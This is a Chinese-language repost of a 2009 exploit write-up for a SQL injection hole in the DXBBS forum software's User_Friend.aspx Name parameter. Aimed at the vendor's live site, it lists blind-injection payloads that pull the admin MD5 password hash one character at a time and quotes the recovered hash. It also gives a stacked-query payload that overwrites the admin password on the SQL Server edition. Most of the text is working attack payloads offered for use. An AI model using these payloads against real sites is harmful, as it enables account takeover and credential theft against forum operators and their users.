首页 网络安全 安全学院 查看内容

dxbbs漏洞(通杀7.3以前所有版本)

2009-2-4 10:20 630 0

摘要: 来源:shui落花漏洞出现在User_Friend.aspx , 由于过滤不严,造成name允许注入, 不多说了,自己看吧。--------------------------------------...
关键词: User 密码 dxbbs admin name select asc pass where 用户表

来源:shui落花漏洞出现在User_Friend.aspx , 由于过滤不严,造成name允许注入, 不多说了,自己看吧。-------------------------------------------------------------------------------------------http://www.dxbbs.cn/这是DXBBS官方网站,版本是7.3,用的access数据库在User_Friend.aspx过滤了=Add&Name=admin加上典型的过滤不严,由于是access,在没有工具的情况下,只能一个一个猜解了默认管理员是admin, 我们来猜解admin的密码, 工具是老兵的注入浏览器,用的是asc转换猜解法, 我已经下载了一份源代码,可以看一下数据库结构用户表:DXBBS_user 密码字段:user_passhttp://www.dxbbs.cn/User_F...过滤了=Add&Name=admin'' {v} and a=a , 因为后面还有一个单引号,没办法注释,所以只能这么构造注入语句,{v}是变量首先使用语句确定密码长度and (select top 1 len(user_pass) from DXBBS_user)=16返回:好友已存在 说明密码的确是16位,经过了MD5加密接下来猜解密码:猜解第一位: and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=admin)>=57 返回:数据不存在,猜测错误,说明密码第一位的ASC值小于57and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=admin)>=55正确,说明密码第一位的ASC值大于等于55and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=admin)>=56返回错误,说明密码第一位的ASC值大于小于56既然大于等于55,小于56,那么这个数值就是55,ASC55对应的字符是:7,也就是说,密码第一位是7,猜测密码第二位就是把and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=admin)>=57改成and (select top 1 asc(mid(user_pass,2,1)) from dxbbs_user where user_name=admin)>=57后面的以此类推5分钟后得到管理员密码:74e92e9ececa0ae7这是MD5加密过的,至于怎么得到明文,不要问我,自己碰运气吧下面介绍SQL版利用方法:ser_Friend.aspx过滤了=Add&Name=大蝉;Update [Dxbbs_user] set user_pass=7a57a5a743894a0e where user_name=admin;--
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部